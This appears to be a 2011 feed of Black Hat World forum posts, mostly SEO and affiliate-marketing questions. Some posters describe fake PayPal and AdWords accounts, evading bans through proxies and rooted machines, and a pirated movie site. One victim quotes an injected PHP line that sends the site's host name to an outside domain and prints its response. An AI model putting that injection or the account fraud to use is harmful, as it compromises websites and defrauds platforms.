Black Hat Forum Black Hat SEO

Hey, I was suggested to try this forum.

Posted: 24 Oct 2011 08:08 PM PDT

Hello everyone, I have just recently tried my hand into online money making. Most recently I am trying affiliate links but not so sure how to build a strong list.

I hope to learn what I can here from those more experienced than I in this field, maybe pick up some SEO tricks also if at all possible.

Happy to be here, have a great night.:)

I'd like to ring the necks of you credit card thieves!

Posted: 24 Oct 2011 08:03 PM PDT

I've gone 12 years and NEVER had a credit card stolen. I email & fax our card info to suppliers over 100 times every month and have never had any problems whatsoever.

Last month, my card number was stolen and used over 1000 miles away at a Walmart. Turns out, a local restaurant has a thief on the books.... they have been stealing card numbers and selling them online.

To those of you who are involved in this, know that some of us take it very seriously. I have already begun my investigation into this and I am 100% certain that the guy behind this will end up in prison because of my research.

Next time you steal from someone, keep in mind it might just be someone who knows more than you do. I HATE a thief.... if you steal from me, you're causing physical harm to my kids and I take that VERY seriously.

When creating mass blogs with xgen...

Posted: 24 Oct 2011 08:02 PM PDT

I have been told to blast these blogs I create with my sandscraper, what exactly does this mean? Post a comment on each of them? And on these comments where do I have the comments linking to, back to my main site? Since im a new domain I thoguht I shouldnt be linking back to my own domain with scrapebox comments so what would be the point of this? I appreciate wheover takes time to answer this!

Get Emails of Website owners.

Posted: 24 Oct 2011 07:32 PM PDT

I have a very white hat "looking" type blog, updated daily, and has a big following.

I would like to connect with other bloggers in my niche, and possibly do guest posts and such, or purchase links

Is there an easy way to find their emails? or a service that offers email searching?

Let's JV on some education lead gen

Posted: 24 Oct 2011 07:30 PM PDT

I'm hoping to JV with several people to do some lead gen for educational offers (colleges).
I want to put about half of the resources/time into building a strong web portal for the niche, and split the rest up among other methods.

Edit: a bit about me - I'm a web dev by day so that's obviously my strong suit. I suck at SEO and the like - that's part of why I'm looking for a JV.

I'm working on creating relationships with networks right now as well.

Interested? PM. And I'm not going to be begging for money.

Anyone used IMSlave Link Blaster to get backlinks indexed?

Posted: 24 Oct 2011 06:45 PM PDT

Code:

Have anyone got experience in using this? Does it really work? Will it get my site de-indexed?

I've tried it but couldn't see any one my links in YSE.

Can anyone answer this question! Thank you!

How can you post affilliate links with your threads on this site? Can I upgrade to a paid membership to be able to do that? And one other question: Can I affiliate for blackhatworld on my website? Thank you!

CLAD Help Needed - Willing to pay

Posted: 24 Oct 2011 06:25 PM PDT

I've had this on going issue with getting CLAD and the pva verification system to work. Their pro support, the one where you pay "$49.95 per month" - is about as worthless as asking my dog to set up CLAD.

I am so annoyed and frusterated, that I would just rather pay someone to help me set up the PVA. I am not looking for any long term support or training, just a quick and simple fix.

Send me a pm with a quote. I have everything set up, phone tag, skype, etc. Just having issues with CLAD reading the e-mail from phone tag.

Overkill permalink structure?

Posted: 24 Oct 2011 06:10 PM PDT

Sup everyone

So I have a new site, it's an EMD + 1 word. So let's say my keyword is "dog toys".

My domain is dogtoysinfo.com

I'm going to have about 15 general articles about dog toys. Would it be overkill if my permalink was like this?

dogtoysinfo.com/dog-toys/types-of-dog-toys

What do you guys think?

Best way to monetize general traffic.

I'm interested in anyway, even ppv is ok but I want to make atleast $0.05/visitor.

Do you guys have any idea on how to monetize my sites ?

A terrible problem with PayPal - need help!

Posted: 24 Oct 2011 05:27 PM PDT

Hi,

The problem I have does violate the PayPal guidelines, but I am stuck and I am looking a way out of it. So please help me if there's a way. So here's the problem -

A few years back when PayPal had a $100 limitation on the sending limit for each non-verified user. I had no credit cards at that time, so as to receive and spend I created more than one papal accounts with fake accounts. But the problem is that now, I have some money still remaining in the accounts which I neither can't spend nor withdraw without verifying the account but verifying the account is not possible as the accounts are fake. So is there any way now, I can use that money?

I know this is a stupid thing I have done, but that was years ago. Please do help me.

The Media and 7 billion people

Posted: 24 Oct 2011 05:08 PM PDT

Why is the media making it seem like the world is vastly overpopulated? There is ton of land out there can be reclaimed from the desert for both living and farming, though the use of desalination plant. There is over 6 million sq mi/15 million sq km of Desert in the world that could be used for farming and living if it was developed.

The world isn't overpopulated its just that people are too lazy to do what needs to be done to solve the problem.

Breaking the Barrier

Posted: 24 Oct 2011 04:54 PM PDT

I'll be honest, I'm sure as hell not going to beat around the bush I know you guys don't want that crap and I sure as hell wouldn't. So here it is.

I've been acting on advice here on BHW and I'm not letting failure stop me. I don't know what the next step to succeed is but with the amount of failures I got under my belt success is gonna land. Here's a quick run down of what I've done thus far.

So far I have:

1. Done research, lots of it and made sure I stayed focused on services that benefit local businesses nothing else!

2. Created websites with keywords that rank first page for local businesses with a good volume of searches.

3. Called these local businesses to rent these sites(no dice)

4. Setup a corporation for marketing

5. Began cold calling 100-200 restaurants per day to setup SMS marketing VIP clubs within their restaurant.

6. Got the script down packed to the point of getting past the gate keeper 90% of the time when the owner was available(less than 10% of the time) and setup a number of interviews for the following few weeks.

7. Changed up my offer to include a free month, kept the price at a reasonable $250 per month and a demonstration of how it worked via my smartphone during the interview(no dice despite a good level of enthusiasm). I even walked door to door to restaurants immediately talking to the owners/managers when they were there. I never got a bad response by phone or in person, but I didn't get a check either.

8. Decided to switch up and sell SEO through cold calling. Instead of going with the direct sales method I decided referrals will be the way to go I realized I'm obviously dealing with trust issues. So I started pitching FREE (yep free) web design to accountants who want it and I rather then appear disingenuous informed them of how new my company is and that my sincere intent is to provide a solid service for the purpose of getting good referrals. I also alluded to the fact that should they refer me they would enjoy a big fat 10% for each client they sent my way that wrote me a check upfront!

So where am I now? Like I said above I'm going to continue refining my strategies, shifting my methods/services if that's what I discover the client wants and letting any luck, let any helping hand to grab on to mine to break through that barrier where money starts entering my hands for a change.

I want to help people, and myself. I can genuinely create value through the things I have learned here on BHW.

Posted: 24 Oct 2011 04:21 PM PDT

hey guys,
I've noticed something which is a bit annoying to me:

I've bought an info domain which should be redirected to myhost.com/test/bla.html

but however, whenever i enter the info domain in my browser as soon as the browser loads the page, the adress box' sayin the true url: myhost.com/test/bla.html

how can i prevent this? i got my domain from namecheap and my hoster is hostgator.

would be really glad if i could get this handled!

Having trouble locating private proxies in North Carolina for Craigslist posting

Posted: 24 Oct 2011 03:50 PM PDT

I have been searching for days now trying to find a proxy provider that can supply me with 25+ private elite proxy ip's for Craigslist posting. The way I understand it, Craigslist requires IP addresses that are geo-located close to where you are posting. I have basic knowledge of how this all works but I don't know how far away the IP can be from the city I want to post in. I have contacted many of the providers that are in the forums but the help tickets keep coming back that they don't have IP's where I need them. One site sent me back a message that said RDNS lookups do not correspond to the servers location. Does that mean that it's possible to get an NC ip from a server in another state? If so then the question is would they let me choose a set of IP's local to me. I suppose I could start calling ISPs in my area but I have a feeling that their first question will be "what in the world do you need them for?" then a big NO when I tell them. I don't want to even go the Remote DSL route because it is way too expensive for what I'm doing.

Anyone know of any servers set up around central to western NC that would fit my needs? Any recommendations would be appreciated.

AdWords ban spree?

Posted: 24 Oct 2011 03:45 PM PDT

Has anyone else been hit with a ban spree on adwords? I signed up with adwords a few weeks ago, using my real info. I forgot about it for a while due to other PPC networks I use, and they sent me an Email with a voucher. That got me motivated to jump on adwords. I signed up using my adsense account email, and all of my information. When it asked for payment I put in the voucher like it said. A few days later I was perm banned because they "could not verify my billing information".

After Emailing them and deal with total idiots, I called them. They said it was just a temporary review, etc. I get an Email the next day and they tell me that it is in fact permanently banned. When I log into adwords all I see is that it was banned for billing information. I told them "Well how are you sending me checks for adsense if the billing address is wrong? You don't have a cc on file from me because I was on the trial credit." and they never replied to me.

So I had a my neighbor try to sign up to see what happened (different IP of course), they submitted all their info and didn't start any campaigns yet. A few hours later their account was under review. However they added their CC to their account. Four days later their account is permanently banned from adwords. Same reason, unable to verify it.

They didn't add a voucher, they didn't do anything to their account except set up the billing. WTF is going on with adwords? I've since decided to make fake accounts, 9/10 of them died almost instantly. Obviously I know how to hide myself via proxies, vpn's and various other methods including using VPS, dedicated servers, rooted windows boxes, etc. I don't understand what is going on with google. I tried to run a legitimate campaign and got banned for no real reason, so now I have blackhat methods to deal with adwords campaigns without going into details. To be honest I'd rather just pay the bills and do it legitimately but with my account being banned I have no idea what to do. Has anyone had any success getting their account unbanned?

Do Trackbacks help SEO?

On several of my blogs I am starting to get trackbacks in the comments area, I have been deleting them out, but I'm wondering if keeping them help my pages rank better...

Anyone have any advice on this? Does having other people tracking to my blog help my SEO or anything else?

My IM Success Story - What works for me

Posted: 24 Oct 2011 01:46 PM PDT

My success story:

I figured I would share a little bit about what has worked for me and things I've learned over the past year. I've only been in IM for one year, but it's been going really well so far and I've been full time with it for 6 months now. It was a post on the Warrior forum that got me started, so this is my way of paying it forward to those who are new to the game and struggling to figure out what to make of all of this IM stuff.

One year ago:

I was recently graduated from law school but knew I didn't want to be a lawyer. You would think it's all roses and wiping your ass with hundred dollar bills, but the reality is that being a lawyer kinda sucks. It's long hours and tedious paperwork. Unfortunately I figured this out after I was already in law school and had too much invested to drop out. I can't even count the number of my friends from there who either ended up not practicing law or hating their job.

Anyway, I tried instead to work with my father who owns a home building business. 2008 was probably the shittiest year ever for that type of business, and so I tried to help by building him a better website and figuring out how to get it ranked higher. I already knew how to create websites and work with photoshop, so this helped, but I knew nothing about SEO. I remember thinking that websites got ranked according to how popular and "big" the business was. :D

I started doing more and more research until I eventually stumbled upon the Warrior Forum. Jackpot! People were talking about making money and all of this cool stuff I was interested in. I was very lucky to come across this thread: http://www.warriorforum.com/main-int...ded-links.html

I thought that idea was brilliant, and so made it my own and ran with it. Since then (November 2010), I've gone on to make a full time income with this, moved to Colorado to enjoy skiing this season and being outdoors, and my income grows every month. Right now I would say I'm "living the dream." I make my own hours (which are around 40hrs a week now, but will be less during ski season), I can take vacation time whenever I want, and I can afford the things I like while doing what I enjoy. I actually enjoy my work (for the most part), and don't feel that dread I had when I was working a lot of other jobs--that feeling you get when you know you have to be at work in an hour and it's going to suck.

What I do:

My income comes from 3 things: 1) Affiliate marketing with my own product review websites for physical products on Amazon and independent businesses w/their own aff program; 2) SEO services on forums; 3) Offline SEO for a local web design company that outsources to me.

If you can afford to work your job and do IM part time, then building up your affiliate sites is the least headaches and best way to build a long term income stream and build assets that are worth a lot. For me, I wanted to be full time IM as fast as possible, and so it made sense to diversify in order to weather any ranking problems with my affiliate sites. Once I understood how to rank sites well, I felt comfortable offering my services to others. That provided the stable platform to feel comfortable doing things like signing leases and making car payments, etc...

My top 10 tips (or at least, 10 good ones):

1) Learn how to create websites. If there's one thing I've learned in running SEO services, there are a lot of people with shitty sites out there who will spend a lot of money to rank them highly, but almost nothing on making them look nice and giving good information. If any of you read the leaked Giggle quality ranking manual from last week, you'll notice that a GOOD affiliate site is generally not going to be penalized by a manual review. But a 5 page slapped up default install with no graphics and a shit article is going to be hammered if it ever ranks well and gets a manual review. Learn how to use photoshop (youtube tutorials). Buy a custom WP them ($35 on themeforest). With just those 2 things you will be able to create sites that are better than 90% of the junk people spend months trying to rank well and clutter up the Internet with ugliness and garbage information. There's no law that says you can't make a great looking professional affiliate site AND make money. It's not all a scam/hussle.

2) If you don't understand how the idea works, don't waste time doing it. I've seen tons of posts on the forums from people who say stuff like, "I've been in IM for 9 years, had to start over." Or, "I've been doing IM for 2 years, making $1/day now." If that's you, you're doing it wrong. When I read the thread posted above, I immediately knew it was a brilliant idea and could make a ton of money doing it. I was right. Similarly, I wouldn't try some weird idea that I have no idea how to execute or if it has potential to make money.

3) Specialize. In order to make a lot of money, you really need to specialize in one thing and do it really well. If that's building a list, build a list. If that's offline, do offline. But trying one thing for a few months and then going to another thing is a recipe for failure. Luckily, I've been able to cut bait when I've tried something that isn't working. An example is offline--I hate selling, and trying to explain to a business owner why spending $1,000/mo for SEO for his law practice is worth 10 times that in value just annoys me when they don't get it. Now, I can pretty much guarantee that if I spent a few more months refining my sales pitch and other aspects that I could succeed, but in the month or so that I tried it, it was way harder than I thought it would be. Which leads me to:

4) Write down your goal and make sure whatever you try has the potential to get you there. One of the things I realized with offline is that it was leading me down a path I didn't like. I don't want to answer support calls and deal with clients on a daily basis. I don't want to "sell" people on something that they should be knocking down my door to get from me. I want to be able to travel any time I want and not worry that I have to get back to the office soon. So that led me to the realization that even though offline would supply me with another source of income, I didn't want it. Don't trap yourself into a job you don't want if it moves you away from your goal, whatever that is.

5) Stalk people online. And by stalk, I mean once you find people that are clearly making a ton of money online, check up on their posts every once in a while to see what they are doing or what they share. I've found tons of good information by checking up on people I know on WF who really know their stuff. This saves time from sorting through the shit posts that clutter most forums.

6) Know how to do everything your pay someone else to do. This is especially true when it comes to building links. One my first mistakes was completely relying on a provider on WF to rank my sites, and when they couldn't do it I was out a few hundred and a couple of months. You need to understand what it is that the person is doing so that you can have realistic expectations of what your sites will do with their service, and how to continue boosting your site when they are done.

7) Word hard AND smart. At the beginning, you will be forced to do everything yourself. Eventually you will be able to outsource the things that are tedious and take no skill. But at the start, you better be willing to work hard. None of this "press a button and make $10,000!" That's a pipe dream for suckers to buy WSO's. If you aren't willing to work hard, you don't deserve to succeed, and probably won't.

8) Take the time to really learn about the product you are offering to people. Is it really a good product, or is it just a piece of shit with a high commission that you want to get? If you really do the research for people to find exactly what they're looking for, and you're honest with them, you will see conversions increase.

9) Learn to write good reviews. A good product review will start off with a bullet point list of the features and specifications of the product, followed by a detailed review and perhaps a comparison to a competing product if applicable. Learn the difference between pre-selling and selling. Pre-selling you will point out some of the weaknesses of the product (but said in a way that makes it not that bad) to make your review more credible and not sound like a sales pitch. For example, if you are selling a high end microwave, a negative might be that it's expensive, BUT that's not really a negative if it has features that make it worth it.

10) Start in a niche you know something about. It will be easier to write good articles and you might even know of suppliers with their own affiliate program. For example, you will generally be around 6-7% with amazon, but some small businesses that are tech savvy might have affiliate programs paying out 15-20% for physical products.

Hope this helps some of you out there.

Please Help! Payment Processor giving me problems

I have only received one, and I mean one, report in the last six months! I need an exact break down of where my money is going! Oh and forget fraud tools or charge back reporting capability, I don't even think they know what that is! Please help I need a new provider!

Having trouble with MS Trial

Posted: 24 Oct 2011 01:28 PM PDT

Hey guys,

I've been using the 40 day Market Samurai trial for a few weeks with no problems at all. This morning, I open it up, and I get a screen saying:

"Your copy of Market Samurai requires an important update. Please visit this link and click the 'Install Now' button to update to the latest version".

Googled this, couldn't find anyone getting a similar screen. When I click on the link, it takes me to "http://anonym.to/" and then nothing happens.

Anybody have this problem before?

want to put up a movie site

Posted: 24 Oct 2011 01:13 PM PDT

I'm looking to put up a movie site and content lock, etc...

I have just a couple questions......

I'm sure it's best to go with offshore hosting for something like this, does anyone have any recommendations?

I plan on picking up a video script either free or otherwise.....from someone with no experience in dealing with such a script, is it a good idea to grab hosting that offers a ton of disk storage, since I'm sure that by the time a few movies get uploaded, it won't be long before it's taking up some major space?

I need someone to point me in the right direction, any help is much appreciated, I'll give +rep and thanks....

Thanks Everyone!

Does anyone know netanalytic.com?

Hi,

one of my websites index.php got infiltrated. There was no server hack, but the file was modified. I only recognized it because the site has slowed down dramatically. I looked for the reason and found out that it tries to establish a connection to 68.169.39.52, which is none of my servers. So i searched through the files and found this line of code:

Code:

<?php error_reporting(0); echo @file_get_contents("http://netanalytic.com/linkadmin/tracker/tracker.php?h=".$_SERVER['HTTP_HOST']."&id=33"); ?>
The website is down. Does anyone know netanalytic.com? Could not find anything but stat-pages (those we use to index our sites ;) )

Seems like an attack from a competitor or?

Anyone using Droid apparently to get up with earnings/ site views?

I have a widget apparently that displays site views for my sites. I tried Droidsense for AdSense but it doesn't work right. I tried a few other apparently that track clickbank/CJ/AdSense and a few other networks, but AdSense doesn't work there either.
